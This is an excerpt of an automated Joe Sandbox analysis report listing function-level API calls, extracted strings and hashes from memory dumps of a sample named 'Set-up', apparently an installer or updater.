                                                                                                                                  • Instruction Fuzzy Hash: EB11A9362102099FC714DF58E845BAAB7E8EB55315F1041ABEC40D7310D7B2ACA5DBA1
                                                                                                                                  APIs
                                                                                                                                  • FindWindowExW.USER32(00000000,00000000,?,00000000), ref: 058F9253
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FindWindow
                                                                                                                                  • String ID: SQ$_]
                                                                                                                                  • API String ID: 134000473-3330144509
                                                                                                                                  • Opcode ID: 27c3f866bfc1e911dcc20d4ae910d2088e24c3aac21d5f5e20d59f42217e890c
                                                                                                                                  • Instruction ID: 2fdc5c6d7b36ce90a2ea84456be747c42b6f4826cfeeb33c46eac04db5859319
                                                                                                                                  • Opcode Fuzzy Hash: 27c3f866bfc1e911dcc20d4ae910d2088e24c3aac21d5f5e20d59f42217e890c
                                                                                                                                  • Instruction Fuzzy Hash: 0021BBB110D7808BE334DF21C9957EFBAE6AB88704F14882CE18ADB291DB744445CB02
                                                                                                                                  APIs
                                                                                                                                  • FindWindowExW.USER32(00000000,00000000,?,00000000), ref: 058F9253
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FindWindow
                                                                                                                                  • String ID: SQ$_]
                                                                                                                                  • API String ID: 134000473-3330144509
                                                                                                                                  • Opcode ID: 4166df4e1f6b5f93f5779b49a61b34ee3c2a46db461badb521cdfb022f3c86ff
                                                                                                                                  • Instruction ID: ac6b0110fa7ff33812da4d3275f0f5498828eea4b14001204f349d34869e8b5a
                                                                                                                                  • Opcode Fuzzy Hash: 4166df4e1f6b5f93f5779b49a61b34ee3c2a46db461badb521cdfb022f3c86ff
                                                                                                                                  • Instruction Fuzzy Hash: C6218BB110D7808BE334DF25D9957EFFBE6AF88704F14882CE18A9B295DB744445CB02
                                                                                                                                  APIs
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0106FBEC
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionException@8RaiseThrow
                                                                                                                                  • String ID: during $InstallState error 0x
                                                                                                                                  • API String ID: 3976011213-3843838528
                                                                                                                                  • Opcode ID: 0e519a4d3414ba5f435f81a78987e574f7f2c49160072928bd3113816a0cddb9
                                                                                                                                  • Instruction ID: 128741a7f2e2ec5bc7abca615dc7d0dcd563de08a849a003b97a3b82827a4db7
                                                                                                                                  • Opcode Fuzzy Hash: 0e519a4d3414ba5f435f81a78987e574f7f2c49160072928bd3113816a0cddb9
                                                                                                                                  • Instruction Fuzzy Hash: 03119071905248BBDB15DBA4DC12FEEBBA8EB04B04F10855DF524A7282DB769A048791
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  • Unknown, xrefs: 00E315DA
                                                                                                                                  • The status of the currently installed version is unknown because there has not been a recent, successful check for updates., xrefs: 00E315CB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: The status of the currently installed version is unknown because there has not been a recent, successful check for updates.$Unknown
                                                                                                                                  • API String ID: 0-2368558394
                                                                                                                                  • Opcode ID: 4ebcd3167cb6df68e9bad55b823dad69e30ee0097aff23f9e2984baa0fe26d68
                                                                                                                                  • Instruction ID: 7c4b07061723bfc12ff7fabab36657079f0ed488de3c541d1c6d853fbeb51937
                                                                                                                                  • Opcode Fuzzy Hash: 4ebcd3167cb6df68e9bad55b823dad69e30ee0097aff23f9e2984baa0fe26d68
                                                                                                                                  • Instruction Fuzzy Hash: 4711A3B0A05304DBEB14DF64DD06759BFF8EB01714F148269E4155B3C4DB799505CB91
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !af_$ncvector<struct UpdateInfo>::push_back
                                                                                                                                  • API String ID: 0-2427261775
                                                                                                                                  • Opcode ID: a0031dea5b82dc87cc2828776d7d4fd1f250e447e9692ff0daebda99fc4703a4
                                                                                                                                  • Instruction ID: 129878d3f325c302d45a0f7ecc3db33ea73b6a37ab22379ed3ce2cc84c42d074
                                                                                                                                  • Opcode Fuzzy Hash: a0031dea5b82dc87cc2828776d7d4fd1f250e447e9692ff0daebda99fc4703a4
                                                                                                                                  • Instruction Fuzzy Hash: 7B01F9B1A44258AFD724DF54DC02B6AB7E8E704B20F00463EE814A77C0EBB619108790
                                                                                                                                  APIs
                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 011192E5
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 011192F3
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionException@8RaiseThrowstd::invalid_argument::invalid_argument
                                                                                                                                  • String ID: bad function call
                                                                                                                                  • API String ID: 4038826145-3612616537
                                                                                                                                  • Opcode ID: ca455b49324c7b933f6ff9b35dd68afcd2ae977f75163e8996757bc7c20b18b0
                                                                                                                                  • Instruction ID: d33fe746928355f63be9078b94811981ed8ca38254060803783dcee0b22c774a
                                                                                                                                  • Opcode Fuzzy Hash: ca455b49324c7b933f6ff9b35dd68afcd2ae977f75163e8996757bc7c20b18b0
                                                                                                                                  • Instruction Fuzzy Hash: 00C01239C0020C7BCF08B6A5D9A5C8CB7797E24504F8084786720A3048E7709618C685
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0000000C,460C02D8,00000000,00E7C2D7), ref: 00F06DAE
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0000000C), ref: 00F06DD3
                                                                                                                                  • EnterCriticalSection.KERNEL32(0000000C), ref: 00F06DFA
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0000000C), ref: 00F06E1C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                  • Opcode ID: 919dc44a8a5acfb1f0f0e40eef561fd87c04ec875fde82ea2632c41ebff17273
                                                                                                                                  • Instruction ID: d7e8d741db691a908467d3ac8d7f6588dd516a780cf477190fd1a858af201a04
                                                                                                                                  • Opcode Fuzzy Hash: 919dc44a8a5acfb1f0f0e40eef561fd87c04ec875fde82ea2632c41ebff17273
                                                                                                                                  • Instruction Fuzzy Hash: 3131AE7490064ADFCB24CF64C9887AEFFB8FF09324F20025AD815A7781D7786A58CB95
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131B8F8,460C02D8), ref: 00E5F208
                                                                                                                                    • Part of subcall function 00E5F120: EnterCriticalSection.KERNEL32(0131B8F8,460C02D8), ref: 00E5F158
                                                                                                                                    • Part of subcall function 00E5F120: LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E5F1A8
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131B8F8), ref: 00E5F23A
                                                                                                                                    • Part of subcall function 00E5EE70: GetConsoleScreenBufferInfo.KERNEL32(?,?,?,?,?,00E5F001,?,?), ref: 00E5EE9D
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E5F275
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E5F287
                                                                                                                                    • Part of subcall function 00E651C0: SetConsoleCursorInfo.KERNEL32(?,?,460C02D8), ref: 00E65239
                                                                                                                                    • Part of subcall function 00E651C0: GetLastError.KERNEL32 ref: 00E65243
                                                                                                                                    • Part of subcall function 00E651C0: __CxxThrowException@8.LIBVCRUNTIME ref: 00E65287
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterLeave$ConsoleInfo$BufferCursorErrorException@8LastScreenThrow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2192776864-0
                                                                                                                                  • Opcode ID: 510411f6e952a504ce3ac481ed09cb0b44543d167deabac61b3786a756776b54
                                                                                                                                  • Instruction ID: 8e3dbe1dfd42a9493c2f975c5f8d6823a3616fa4e9bd9f98b46f9271ee9e239c
                                                                                                                                  • Opcode Fuzzy Hash: 510411f6e952a504ce3ac481ed09cb0b44543d167deabac61b3786a756776b54
                                                                                                                                  • Instruction Fuzzy Hash: 4D21A470904288DECB19DBA9C5097DDBFF8EF06708F10419DE820B7385C7B52A48CBA1